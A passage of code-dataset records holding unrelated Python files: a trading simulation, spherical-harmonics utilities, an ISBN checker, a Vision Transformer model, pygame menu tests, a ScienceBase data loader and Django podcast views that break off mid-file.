{'run': run, 'type': 'sharing', 'step': step, 'mean_value': mean_vs[agent], 'agent': agent}\n value_log.append(log)\n\n sort = sorted(zip(v, zip(samples[agent], trades[agent]))) # sorts ascending by value, low values first\n elite = sort[int(len(sort) * PSI):]\n\n elite_a = [a for _, (a, t) in elite]\n action_means[agent] = (1. - ALPHA) * action_means[agent] + ALPHA * np.mean(elite_a)\n action_stds[agent] = (1. - ALPHA) * action_stds[agent] + ALPHA * np.std(elite_a)\n action_stds[agent] = max(action_stds[agent], MIN_STD)\n\n elite_t = [t for _, (a, t) in elite]\n trade_means[agent] = (1. - ALPHA_SHARE) * trade_means[agent] + ALPHA_SHARE * np.mean(elite_t)\n trade_stds[agent] = (1. - ALPHA_SHARE) * trade_stds[agent] + ALPHA_SHARE * np.std(elite_t)\n trade_stds[agent] = max(trade_stds[agent], MIN_STD_SHARE)\n\n value = np.sum([mean_vs[i] for i in range(N_AGENTS)])\n log = {'run': run, 'type': 'sharing', 'step': step, 'mean_value': value, 'agent': 'joint'}\n value_log.append(log)\n\ntext_file = open(result_dir + '/seed.txt', 'w')\ntext_file.write(str(seed))\ntext_file.close()\n\ndf = pd.DataFrame(value_log)\ndf.to_csv(result_dir + '/values.csv', sep='\\t', encoding='utf-8')\n\nfor agent in range(N_AGENTS):\n plt.figure(str(agent) + '_values')\n agent_df = df.loc[df['agent'] == agent]\n sns.tsplot(data=agent_df, time='step', value='mean_value', unit='run', condition='type') # ci='sd'\n plt.savefig(result_dir + '/values_' + str(agent) + '.png')\n\ndf_base = df.loc[df['type'] == 'independent']\ndf_sharing = df.loc[df['type'] == 'sharing']\nratios = df_sharing['mean_value'].values / df_base['mean_value'].values\ndf_sharing['ratio'] = pd.Series(ratios, index=df_sharing.index)\ndf_sharing = df_sharing.loc[df_sharing['agent'] != 'joint']\n\nplt.figure('ratios')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run', condition='agent')\nplt.savefig(result_dir + '/ratios.png')\n\nplt.figure('ratios_median')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run', condition='agent', estimator=np.median)\nplt.savefig(result_dir + '/ratios_median.png')\n\nplt.figure('joint_values')\njoint_df = df.loc[df['agent'] == 'joint']\nsns.tsplot(data=joint_df, time='step', value='mean_value', unit='run', condition='type')\nplt.savefig(result_dir + '/joint_values.png')\n\ndf_base = joint_df.loc[joint_df['type'] == 'independent']\ndf_sharing = joint_df.loc[joint_df['type'] == 'sharing']\nratios = df_sharing['mean_value'].values / df_base['mean_value'].values\ndf_sharing.loc[:, 'ratio'] = ratios\n\nplt.figure('joint_ratio')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run')\nplt.savefig(result_dir + '/joint_ratio.png')\n\nplt.figure('joint_ratio_median')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run', estimator=np.median)\nplt.savefig(result_dir + '/joint_ratio_median.png')\n\nplt.figure('trades')\ndf = pd.DataFrame(trade_log)\nsns.tsplot(data=df, time='step', value='mean_trade', unit='run', condition='agent')\nplt.savefig(result_dir + '/trades.png')\n\n# TODO: Compare results for equal target functions with results for varying target functions\n# TODO: Measure trading volume\n# TODO: Measure effect of trading on individual rewards\n# TODO: Measure effect of trading on disparity (e.g. gini index)\n# TODO: Log maximum/minimum single agent value/utility (-> related to disparity)\n# TODO: More than two agents, e.g. by increasing the trading action dimensionality.\n# TODO: CMA-ES\n# TODO: Effect of trade clipping/no clipping\n","sub_path":"dos/sharing_robustness.py","file_name":"sharing_robustness.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8105957","text":"import numpy as np\r\nimport lie_learn\r\nfrom lie_learn.representations.SO3 import spherical_harmonics as sh\r\nfrom lie_learn.spaces import S2, spherical_quadrature as sq\r\nfrom lie_learn.representations.SO3 import wigner_d as wd\r\n\r\n#good for complex\r\ndef change_coordinates_R2(coords, p_from = \"C\"):\r\n #p_from can be \"C\" (Cartesian) or anything else (polar coordinates)\r\n #coords should be an ndarray of two columns (x,y) or (r, ro)\r\n #routine used to transform 2d picture to coords that represent points on the sphere\r\n #coords[:,0] is beta and coords[:,1] is alpha\r\n if p_from == \"C\":\r\n cartesian_coords = coords.copy()\r\n coords[:, 0] = np.sum(cartesian_coords**2,1)\r\n coords[:, 1] = np.arctan2(cartesian_coords[:, 1], cartesian_coords[:,0])\r\n coords[:, 0] = np.pi * coords[:, 0]\r\n return coords\r\n\r\n\r\n#good for complex\r\ndef get_coef_grid(f_grid, a = 1.0):\r\n #Generate the coordinates and activation values according to Risi's paper\r\n n = f_grid.shape[0]\r\n x, y = np.where(f_grid == f_grid)\r\n new_f = f_grid[x, y]\r\n x = (x.astype(float) - (n - 1) / 2) / (n/2) * a\r\n y = (y.astype(float) - (n - 1) / 2) / (n/2) * a\r\n r = x**2 + y ** 2\r\n idx = r < 1\r\n coords = np.stack((x[idx], y[idx]), axis=-1)\r\n new_f = new_f[idx]\r\n return change_coordinates_R2(coords), new_f\r\n\r\ndef _rotation_matrix(angles, wikipedia=False):\r\n s1 = np.sin(angles[0])\r\n s2 = np.sin(angles[1])\r\n s3 = np.sin(angles[2])\r\n c1 = np.cos(angles[0])\r\n c2 = np.cos(angles[1])\r\n c3 = np.cos(angles[2])\r\n if wikipedia:\r\n R = np.asmatrix([[c1*c2*c3 - s1*s3, -c3*s1 - c1*c2*s3, c1*s2],\r\n [c1*s3 + c2*c3*s1, c1*c3 - c2*s1*s3, s1*s2],\r\n [-c3*s2, s2*s3, c2]])\r\n else:\r\n Rz = np.asmatrix([[c1,-s1,0], [s1,c1,0], [0,0,1]])\r\n Ry = np.asmatrix([[c2, 0, -s2], [0,1,0], [s2,0, c2]])\r\n Rz2 = np.asmatrix([[c3,-s3,0], [s3,c3,0], [0,0,1]])\r\n R = (Rz2 * Ry * Rz).T\r\n return R\r\n\r\n\r\n#good for complex\r\ndef rotate_coords(beta, alpha, angles, direction=1):\r\n #Rotate the spherical coordinates by angles (a tuple of three Euler angles)\r\n if direction == -1:\r\n angles = (-angles[0], -angles[1], -angles[2])\r\n scoords = np.stack((beta, alpha), -1)\r\n ccoords = S2.change_coordinates(scoords, \"S\", \"C\")\r\n\r\n R = _rotation_matrix(angles, wikipedia=False)\r\n ccoords_rotated = np.asarray((R * ccoords.T).T)\r\n\r\n scoords_rotated = S2.change_coordinates(ccoords_rotated, 'C', 'S')\r\n return scoords_rotated[:,0], scoords_rotated[:,1]\r\n\r\n\r\n\r\n#good for complex (caveat: only taking inner product)\r\ndef get_coef_C(f, beta, alpha, \r\n lmax=14, \r\n chop_coeffs=False, \r\n complexFlag=True,\r\n sph=None):\r\n #Each row of f, beta, alpha form a point on the sphere, where f is the activation value\r\n #Compute the coefficients, spherical harmonics values, and return them and f,beta,alpha back\r\n\r\n if sph is None:\r\n #If sph is given, reuse it. This might help improve performance\r\n sph = np.zeros((len(f),(lmax+1)**2), dtype=complex)\r\n for l in range(lmax + 1):\r\n for m in range(-l, l+1):\r\n if complexFlag:\r\n sph[:, l**2+(m+l)] = sh.csh(l,m,beta,alpha,'quantum',True)\r\n else:\r\n sph[:, l**2+(m+l)] = sh.rsh(l,m,beta,alpha,'quantum',True)\r\n coefs = (np.expand_dims(f, 1)*sph).sum(0)\r\n \r\n if chop_coeffs:\r\n n = len(coefs)\r\n st = 0\r\n d = 1\r\n coefs_old = coefs\r\n coefs = []\r\n while(st < n):\r\n coefs.append(coefs_old[st:(st+d)].copy())\r\n st += d\r\n d += 2\r\n return coefs, sph\r\n else:\r\n return coefs, sph\r\n\r\ndef reconstruct(f, beta=None, alpha=None, complexFlag=False):\r\n if beta is None or alpha is None:\r\n coords = get_coef_grid(np.zeros((28,28)))[0]\r\n beta = coords[:,0]\r\n alpha = coords[:,1]\r\n vs = np.zeros(beta.shape, dtype=complex if complexFlag else float)\r\n sh_func = sh.csh if complexFlag else sh.rsh\r\n if isinstance(f, list):\r\n lmax = len(f) - 1\r\n for l in range(lmax+1):\r\n for m in range(-l,l+1):\r\n vs[:] += f[l][m+l] * sh_func(l,m,beta, alpha,\"quantum\",False)\r\n else:\r\n lmax = int(np.sqrt(f.shape[0])) - 1\r\n for l in range(lmax+1):\r\n for m in range(-l,l+1):\r\n vs[:] += f[l**2+m+l] * sh_func(l,m,beta, alpha,\"quantum\",False)\r\n return vs\r\n\r\n#NOT good for complex\r\ndef plot_sphere_func(f, beta=None, alpha=None, normalize=True):\r\n if beta is None or alpha is None:\r\n coords = get_coef_grid(np.zeros((28,28)))[0]\r\n beta = coords[:,0]\r\n alpha = coords[:,1]\r\n # TODO: update this function now that we have changed the order of axes in f\r\n import matplotlib.pyplot as plt\r\n from matplotlib import cm, colors\r\n from mpl_toolkits.mplot3d import Axes3D\r\n from scipy.special import sph_harm\r\n\r\n if normalize:\r\n #f = (f - np.min(f)) / (np.max(f) - np.min(f))\r\n print(\"Normalizing pixels\")\r\n f = (f - np.mean(f)) / np.std(f)\r\n\r\n\r\n x = np.sin(beta) * np.cos(alpha)\r\n y = np.sin(beta) * np.sin(alpha)\r\n z = np.cos(beta)\r\n if f.ndim == 2:\r\n f = cm.gray(f)\r\n print('2')\r\n\r\n # Set the aspect ratio to 1 so our sphere looks spherical\r\n fig = plt.figure(figsize=plt.figaspect(1.))\r\n ax = fig.add_subplot(111, projection='3d')\r\n #ax.plot_surface(x, y, z, rstride=1, cstride=1, facecolors=f ) # cm.gray(f))\r\n #ax.plot_trisurf(x,y,z,color=f)\r\n ax.scatter(xs=x,ys=y,zs=z,c=f)\r\n\r\n # Turn off the axis planes\r\n ax.set_axis_off()\r\n plt.show()\r\n\r\n#NOT good for complex\r\n\"\"\"Checking covariance\"\"\"\r\ndef rotate_Y(l, Y, alpha, beta, gamma):\r\n #Rotating the Y (spherical harmonic values) with three Euler angles\r\n #each row of Y is the spherical harmonic values at one point (or different bases)\r\n Y2 = Y.copy()\r\n D = wd.wigner_D_matrix(l, alpha,beta,gamma)\r\n for pix in range(Y.shape[0]):\r\n for m in range(-l, l+1, 1): \r\n Y2[pix,m] = np.sum(D[m,:] * Y[pix,:])\r\n return Y2\r\n","sub_path":"CGNet/geometries.py","file_name":"geometries.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"123228006","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 22 11:08:29 2019\n\n@author: xie\n\"\"\"\n\nn = input().split('-')\nans0 = ''\nans = 0\n\nfor i in n[:-1]:\n ans0 += str(i)\n\nt = 1\n\nfor c in ans0:\n ans += int(c)*t\n t += 1\n\nif n[-1] == 'X':\n if ans % 11 == 10:\n print('Right')\n else:\n for i in n[:-1]:\n print(i, end='-')\n print(ans % 11)\nelse:\n if ans % 11 == int(n[-1]):\n print('Right')\n else:\n for i in n[:-1]:\n print(i, end='-')\n print(ans % 11 if ans%11 != 10 else 'X')\n\n","sub_path":"洛谷自行练习/P1055 ISBN号码.py","file_name":"P1055 ISBN号码.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"126478671","text":"\"\"\"\noriginal code from rwightman:\nhttps://github.com/rwightman/pytorch-image-models/blob/master/timm/models/vision_transformer.py\n\"\"\"\nfrom functools import partial\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\n\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False):\n \"\"\"\n Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,\n the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...\n See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for\n changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use\n 'survival rate' as the argument.\n \"\"\"\n if drop_prob == 0. or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1) # work with diff dim tensors, not just 2D ConvNets\n random_tensor = keep_prob + torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_() # binarize\n output = x.div(keep_prob) * random_tensor\n return output\n\n\nclass DropPath(nn.Module):\n \"\"\"\n Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).\n \"\"\"\n\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\n\nclass Attention(nn.Module):\n def __init__(self,\n dim, # 输入token的dim\n num_heads=8,\n qkv_bias=False,\n qk_scale=None,\n attn_drop_ratio=0.,\n proj_drop_ratio=0.):\n super(Attention, self).__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop_ratio)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop_ratio)\n\n def forward(self, x):\n # [batch_size, num_patches + 1, total_embed_dim]\n B, N, C = x.shape\n\n # qkv(): -> [batch_size, num_patches + 1, 3 * total_embed_dim]\n # reshape: -> [batch_size, num_patches + 1, 3, num_heads, embed_dim_per_head]\n # permute: -> [3, batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n # [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)\n\n # transpose: -> [batch_size, num_heads, embed_dim_per_head, num_patches + 1]\n # @: multiply -> [batch_size, num_heads, num_patches + 1, num_patches + 1]\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n # @: multiply -> [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n # transpose: -> [batch_size, num_patches + 1, num_heads, embed_dim_per_head]\n # reshape: -> [batch_size, num_patches + 1, total_embed_dim]\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass Mlp(nn.Module):\n \"\"\"\n MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass Block(nn.Module):\n def __init__(self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=False,\n qk_scale=None,\n drop_ratio=0.,\n attn_drop_ratio=0.,\n drop_path_ratio=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm):\n super(Block, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop_ratio=attn_drop_ratio, proj_drop_ratio=drop_ratio)\n # NOTE: drop path for stochastic depth, we shall see if this is better than dropout here\n self.drop_path = DropPath(drop_path_ratio) if drop_path_ratio > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop_ratio)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass VisionTransformer(nn.Module):\n def __init__(self, num_patches, input_dim=51, num_classes=5,\n embed_dim=768, depth=12, num_heads=12, mlp_ratio=4.0, qkv_bias=True,\n qk_scale=None, representation_size=None, distilled=False, drop_ratio=0.,\n attn_drop_ratio=0., drop_path_ratio=0., norm_layer=None,\n act_layer=None):\n \"\"\"\n Args:\n img_size (int, tuple): input image size\n patch_size (int, tuple): patch size\n in_c (int): number of input channels\n num_classes (int): number of classes for classification head\n embed_dim (int): embedding dimension\n depth (int): depth of transformer\n num_heads (int): number of attention heads\n mlp_ratio (int): ratio of mlp hidden dim to embedding dim\n qkv_bias (bool): enable bias for qkv if True\n qk_scale (float): override default qk scale of head_dim ** -0.5 if set\n representation_size (Optional[int]): enable and set representation layer (pre-logits) to this value if set\n distilled (bool): model includes a distillation token and head as in DeiT models\n drop_ratio (float): dropout rate\n attn_drop_ratio (float): attention dropout rate\n drop_path_ratio (float): stochastic depth rate\n embed_layer (nn.Module): patch embedding layer\n norm_layer: (nn.Module): normalization layer\n \"\"\"\n super(VisionTransformer, self).__init__()\n self.num_classes = num_classes\n self.num_features = self.embed_dim = embed_dim # num_features for consistency with other models\n self.num_tokens = 2 if distilled else 1\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n\n self.patch_embed = nn.Linear(input_dim, embed_dim)\n\n self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n self.dist_token = nn.Parameter(torch.zeros(1, 1, embed_dim)) if distilled else None\n self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + self.num_tokens, embed_dim))\n self.pos_drop = nn.Dropout(p=drop_ratio)\n\n self.blocks = nn.Sequential(*[\n Block(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop_ratio=drop_ratio, attn_drop_ratio=attn_drop_ratio, drop_path_ratio=drop_path_ratio,\n norm_layer=norm_layer, act_layer=act_layer)\n for i in range(depth)\n ])\n self.norm = norm_layer(embed_dim)\n\n # Representation layer\n if representation_size and not distilled:\n self.has_logits = True\n self.num_features = representation_size\n self.pre_logits = nn.Sequential(OrderedDict([\n (\"fc\", nn.Linear(embed_dim, representation_size)),\n (\"act\", nn.Tanh())\n ]))\n else:\n self.has_logits = False\n self.pre_logits = nn.Identity()\n\n # Classifier head(s)\n self.head = nn.Linear(self.num_features, num_classes) if num_classes > 0 else nn.Identity()\n self.head_dist = None\n if distilled:\n self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()\n\n def forward_features(self, x):\n # [B, C, H, W] -> [B, num_patches, embed_dim]\n x = self.patch_embed(x) # [B, 196, 768]\n # [1, 1, 768] -> [B, 1, 768]\n cls_token = self.cls_token.expand(x.shape[0], -1, -1)\n if self.dist_token is None:\n x = torch.cat((cls_token, x), dim=1) # [B, 197, 768]\n else:\n x = torch.cat((cls_token, self.dist_token.expand(x.shape[0], -1, -1), x), dim=1)\n\n x = self.pos_drop(x + self.pos_embed)\n x = self.blocks(x)\n x = self.norm(x)\n if self.dist_token is None:\n return self.pre_logits(x[:, 0])\n else:\n return x[:, 0], x[:, 1]\n\n def forward(self, x):\n x = self.forward_features(x)\n if self.head_dist is not None:\n x, x_dist = self.head(x[0]), self.head_dist(x[1])\n if self.training and not torch.jit.is_scripting():\n # during inference, return the average of both classifier predictions\n return x, x_dist\n else:\n return (x + x_dist) / 2\n else:\n x = self.head(x)\n return x\n","sub_path":"代码——Transfer/transformer_model.py","file_name":"transformer_model.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"572864407","text":"import turtle\nimport random\n\nturtle.speed(25)\nturtle.setheading(0)\n\ndef pinwheel(num_branch, size, backup):\n turtle.pendown()\n for i in range (num_branch):\n turtle.forward(size)\n turtle.backward(backup)\n turtle.right(360/num_branch)\n turtle.penup()\n\nturtle.penup()\nfor i in range (10):\n # shuffle zone\n x = random.randint(-325, 325)\n y = random.randint(-325, 325)\n clr_list = random.choice(['red', 'blue', 'gold', 'brown', 'violet', 'pink', 'orange', 'yellow'])\n pensize = random.randint(5, 25)\n side = random.randint(5, 20)\n shapesize = random.randint(25, 150)\n backup = random.randint(25, 150)\n # turtle zone\n turtle.goto(x, y)\n turtle.pencolor(clr_list)\n turtle.pensize(pensize)\n pinwheel(side,shapesize,backup)\nturtle.done()","sub_path":"6310545566_Phawit_ex4/pinwheel.py","file_name":"pinwheel.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257197942","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom utils import RGA\n\n# The following code performs Example 3.11 of Skogestad.\ndef G(s):\n G = 0.01*np.exp(-5*s)/((s + 1.72e-4)*(4.32*s + 1))*np.array([[-34.54*(s + 0.0572), 1.913], [-30.22*s, -9.188*(s + 6.95e-4)]])\n return G\n\ndef RGAnumberDiag(A):\n RGAnumD = np.sum(np.abs(RGA(A) - np.identity(len(A))))\n return RGAnumD\n\ndef RGAnumberoffDiag(A):\n RGAnumOD = np.sum(np.abs(RGA(A) - np.array([[0, 1], [1, 0]])))\n return RGAnumOD\n\nw = np.logspace(-5, 1, 1000)\ns = 1j*w\nfreq = map(G, s)\n\nl = [R for R in map(RGA, freq)]\nDiagnum = np.array([Rd for Rd in map(RGAnumberDiag, freq)])\noffDiagnum = np.array([Rod for Rod in map(RGAnumberoffDiag, freq)])\n\nplt.subplot(1, 2, 1)\nplt.semilogx(w, [np.abs(l[i][0, 0]) for i in range(0, len(w))], 'r')\nplt.semilogx(w, [np.abs(l[i][0, 1]) for i in range(0, len(w))], 'b')\nplt.title('(a)')\nplt.text(3e-4, 0.8, '|$\\lambda$$_1$$_2$| = |$\\lambda$$_2$$_1$|', fontsize=15)\nplt.text(3e-4, 0.2, '|$\\lambda$$_1$$_1$| = |$\\lambda$$_2$$_2$|', fontsize=15)\n\nplt.subplot(1, 2, 2)\nplt.semilogx(w, [Diagnum[i] for i in range(0, len(w))], 'r')\nplt.semilogx(w, [offDiagnum[i] for i in range(0, len(w))], 'b')\nplt.title('(b)')\nplt.text(1e-4, 3.2, 'Diagonal pairing', fontsize=15)\nplt.text(1e-4, 0.5, 'Off-diagonal pairing', fontsize=15)\nplt.show()\n","sub_path":"Example_03_11.py","file_name":"Example_03_11.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"511313776","text":"# try:\nimport unittest\n\nimport pygame\n\nfrom settings import *\nfrom main_menu import MainMenu\n\n# except ImportError as message:\n # raise SystemExit(message)\n\n\nclass MainMenuTest(unittest.TestCase):\n def setUp(self):\n # pygame.display.set_mode()\n\n self.main_menu = MainMenu()\n self.surface = pygame.Surface((0, 0))\n self.event_quit = pygame.event.Event(pygame.QUIT)\n self.event_enter1 = pygame.event.Event(pygame.KEYDOWN,\n {'key': MAIN_CONTROLS[0]})\n self.event_enter2 = pygame.event.Event(pygame.KEYDOWN,\n {'key': MAIN_CONTROLS[1]})\n self.event_escape = pygame.event.Event(pygame.KEYDOWN,\n {'key': MAIN_CONTROLS[2]})\n self.event_up1 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P1_CONTROLS[2]})\n self.event_up2 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P2_CONTROLS[2]})\n self.event_down1 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P1_CONTROLS[3]})\n self.event_down2 = pygame.event.Event(pygame.KEYDOWN,\n {'key': P2_CONTROLS[3]})\n\n def tearDown(self):\n # pygame.display.quit()\n\n del self.main_menu\n del self.surface\n del self.event_quit\n del self.event_escape\n del self.event_enter1\n del self.event_enter2\n del self.event_up1\n del self.event_up2\n del self.event_down1\n del self.event_down2\n\n def test_sound(self):\n pygame.event.post(self.event_quit)\n self.main_menu.main(self.surface)\n self.assertFalse(pygame.mixer.get_busy())\n\n def test_reinit(self):\n pygame.event.post(self.event_up1)\n pygame.event.post(self.event_enter2)\n self.main_menu.main(self.surface)\n self.assertFalse(self.main_menu.pointer == 0)\n self.assertIsNot(self.main_menu.get_pressed_button(), None)\n\n self.main_menu.reinit()\n self.assertTrue(self.main_menu.pointer == 0)\n self.assertIs(self.main_menu.get_pressed_button(), None)\n\n def test_update(self):\n self.main_menu.pointer = 182732\n self.main_menu.update()\n\n self.assertTrue(self.main_menu.pointer >= 0 and\n self.main_menu.pointer < len(self.main_menu.buttons))\n self.assertTrue(self.main_menu.buttons[self.main_menu.pointer].\n is_flagged)\n for index in range(len(self.main_menu.buttons)):\n if index != self.main_menu.pointer:\n self.assertFalse(self.main_menu.buttons[index].is_flagged)\n\n def test_main(self):\n pygame.event.post(self.event_quit)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_escape)\n resutl = self.main_menu.main(self.surface)\n self.assertEqual(resutl, EXIT)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_enter1)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, CHARACTER_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_enter2)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, CHARACTER_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_down1)\n pygame.event.post(self.event_enter1)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, OPTIONS_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_up2)\n pygame.event.post(self.event_up1)\n pygame.event.post(self.event_enter2)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, OPTIONS_MENU)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_up1)\n pygame.event.post(self.event_enter1)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n self.main_menu.reinit()\n pygame.event.post(self.event_down1)\n pygame.event.post(self.event_down2)\n pygame.event.post(self.event_enter2)\n result = self.main_menu.main(self.surface)\n self.assertEqual(result, EXIT)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_main_menu.py","file_name":"test_main_menu.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"372457057","text":"# coding: utf-8\n\nfrom IPython.display import display\nimport requests,io,csv\nfrom datetime import datetime\nfrom bis2 import dd\nfrom bis import sgcn\n\nbisDB = dd.getDB(\"bis\")\nsgcnCollection = bisDB[\"SGCN Source Data\"]\n\nswapCollection = \"https://www.sciencebase.gov/catalog/items?parentId=56d720ece4b015c306f442d5&format=json&fields=files,tags,dates&max=1000\"\nsbR = requests.get(swapCollection).json()\n\nfor item in sbR[\"items\"]:\n sourceItem = sgcn.sgcn_source_item_metadata(item)\n \n if sourceItem is None:\n continue\n\n currentRecord = sgcnCollection.find_one({\"processingMetadata.processFileURL\":sourceItem[\"processingMetadata\"][\"processFileURL\"]})\n\n if currentRecord is None:\n sourceItemWithData = sgcn.process_sgcn_source_file(sourceItem)\n \n if len(sourceItemWithData[\"sourceData\"]) > 0:\n sgcnCollection.insert_one(sourceItemWithData)\n print (sourceItemWithData[\"processingMetadata\"][\"sgcn_state\"], sourceItemWithData[\"processingMetadata\"][\"sgcn_year\"], sourceItemWithData[\"processingMetadata\"][\"sourceID\"])\n\n","sub_path":"1_ProcessSGCNRepositorySourceFiles.py","file_name":"1_ProcessSGCNRepositorySourceFiles.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395718653","text":"from django.shortcuts import render, redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Count, Max, Case, When\nfrom django.urls import reverse_lazy\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import DeleteView\n\nfrom podcasts.conf import * # noqa\nfrom podcasts.forms import NewFromURLForm, ListenerSettingsForm, AdminSettingsForm, SiteSettingsForm\nfrom podcasts.models.podcast import Podcast\nfrom podcasts.utils import refresh_feed, chunks, handle_uploaded_file, parse_opml_file\n\nimport json\nimport requests\n\n\n# Create your views here.\ndef index(request):\n # return render(request, 'index.html')\n return redirect('podcasts:podcasts-list')\n\n\nclass PodcastsList(ListView):\n model = Podcast\n paginate_by = PODCASTS_PER_PAGE\n template_name = 'podcasts-list.html'\n\n def get_queryset(self, **kwargs):\n user_ordering = self.request.user.listener.sort_order_podcasts\n queryset = (\n Podcast.objects\n .prefetch_related('subscribers', 'subscribers')\n .prefetch_related('followers', 'followers')\n .annotate(num_episodes=Count('episodes'))\n .annotate(downloaded_episodes=Count(Case(\n When(episodes__downloaded__isnull=False, then=1))))\n .annotate(last_episode_date=Max('episodes__published'))\n .filter(followers=self.request.user.listener)\n .order_by(user_ordering)\n )\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\ndef podcasts_new(request):\n if request.method == 'POST':\n form = NewFromURLForm(request.POST, request.FILES, request=request)\n if form.is_valid():\n if form.cleaned_data['feed_url']:\n podcast, created = Podcast.objects.get_or_create_from_feed_url(\n form.cleaned_data['feed_url'],\n )\n podcast.add_subscriber(request.user.listener)\n podcast.add_follower(request.user.listener)\n\n if 'opml_file' in request.FILES:\n tempfile = handle_uploaded_file(request.FILES['opml_file'])\n feeds = parse_opml_file(tempfile)\n\n for feed in feeds:\n podcast, created = 